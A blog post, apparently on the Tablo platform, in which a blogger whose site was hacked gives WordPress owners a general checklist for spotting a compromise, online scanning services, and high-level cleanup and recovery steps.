Tighten Wordpress Security


Tablo reader up chevron

Last weekend, my blog was hacked

My guess is that some bloggers are as ignorant as I was of what to do. In fact, if I weren’t fortunate enough to get some help, I would’ve been doomed.So I thought I’d share what I did, along with tips for what to do if your blog ever gets hacked.

Fixing a website “hack” is actually a fairly heavy technical thing to do. Most bloggers are not webmasters. They are not really technical people. They’re probably people who simply purchased a web hosting account, maybe set up WordPress using a one-click install, and started blogging.

Often I find that the emails/posts I see that read “help me my site was hacked what do I do” or similar don’t get a lot of help. There’s a reason for this. People who are asking this question are not usually the type of people who are technically capable of actually fixing the problem.

This article will guide you through the steps involved in cleaning a hacked WordPress website. identifying the source of the hack, identifying the infection, cleaning the code, regaining control of your WordPress website or blog.

But, Before we begin,

Is Your Hacked WordPress Website Really Hacked?

Before you start the analysis and WordPress clean-up process, confirm that your WordPress have been hacked. We do receive a lot of false alarms; panicked WordPress administrators can confuse a spam message, or a broken down WordPress website with a hacked website.

What are the compromised websites used for?

Hosting malware

URL redirect

Hosting phishing, spam pages, pornography


Other content or activity

Sending back link to hackers website

Find Out If your Website is Hacked?

Below are the common signs to lookout for in your wordpress website.

Displaying popups that you didn’t implement

Displaying odd text in your footer or in the “View Source”

Links to othersites or auto-linking of keywords that you didn’t create links for

Seeing obfuscated / encoded text in plugins

Website redirecting (immediately or after a short length of time) to another URL

Any mischievous or unusual activity or spikes in traffic or bandwidth usage

Other indicators of a hack include:

Website is blacklisted by Google, Bing, etc..

Host has disabled your website

Website has been flagged for distributing malware

Readers complaining that their desktop AV's are flagging your site

Contacted that your website is being used to attack other sites

Notice behavior that was not authorized (i.e., creation of new users, etc...)

You can visibly see that your site has been hacked when you open it in the browser

Comment Log in or Join Tablo to comment on this chapter...

7 Best Tools To Identify Hacked Sites.

Google Webmaster Tools Email Alerts

One of the great features is their email notifications when they detect bad activity (i.e. hacked!) on your site.

Browser Security Scanner

Scans your internet browser for security vulnerabilities, including outdated computer software and browser plugins like Java, Adobe Flash, Adobe Reader, and Microsoft Silverlight.

Google Safe Browsing diagnostics

(google.com/safebrowsing/diagnostic?site=http://YOURDOMAIN ) See how does google sees it.

StopBadware Clearinghouse


It will scan your Wordpress website for penetration attacks from a 360 degree view, to ensure complete analysis of potential issues. This deep scanner performs a through analysis to check for signs of infection, backdoors, trojans, suspicious code and other security issues.


Will scan your website for malware, trojans, backdoors, worms, viruses, whether your website is blacklisted by Google and other blacklisting authorities.


Runs a Complete Scan to automatically remove known security threats and backdoor scripts. Upgrades vulnerable versions of timthumb scripts.


Scans for the HeartBleed vulnerability - included in the free scan for all users. Scans core files, themes and plugins against WordPress.org repository versions to check their integrity. Verify security of your source.


It is a free virus, malware and URL online scanning service. File checking is done with more than 40 antivirus solutions


A malware scannerIt also runs its own searches for malicious or suspicious iframes, scripts, downloads, redirections, and other items.

Cloaked Link Checker

check to see if your site is cloaked to GoogleBot, has spammy links, funny redirects, or otherwise appears to be hacked. do multiple checks, from detecting spam links, hidden text, up to sophisticated cloaking.

Above are telltale signs that you’ll be able to identify the hack.

Before we head over to steps to how to cleanup Wordpress. Have a look at this info-graphic given below about how to keep your wordpress security, A must follow wordpress security tips cheat sheet for all wordpress users.

Some of the important steps to consider if your wordpress is hacked and how to cleanup Wordpress.

Make a Backup

Identify How WordPress Got Hacked

Audit Logs and Web Server and FTP Server Logs

Non Used and Not Updated WordPress Plugins and Themes

Old WordPress Code and Installations

WordPress Users and Roles

Shared Hosting Providers

.htaccess Files

Check Other Point of Entries

Finding the WordPress Infection & Malicious Code

Check Which Files Modified in the Last Few Days

Check All HTML Files

Search for Infection Text

Reset your website admin password with phpMyAdmin

Update applications, extensions, plugins and themes

Remove your website from blacklists

Get help from google

Google has an 8-step program for unhacking your site, which include basics like identifying the vulnerability that was used to compromise your site, as well as how to request a review so Google will remove the dreaded “this site has been compromised” message from its search results.

For more info and all the details on what to do if you’ve been hacked, check out the new Help for Hacked Sites section of Google’s Webmaster Tools.

If you’ve ever had a site hacked or helped someone else resolve their hack issues, please share what worked best for you. Now is the time for “the fish wasthis big” stories.


Follow On @twitter & @facebook

Comment Log in or Join Tablo to comment on this chapter...

You might like blog's other books...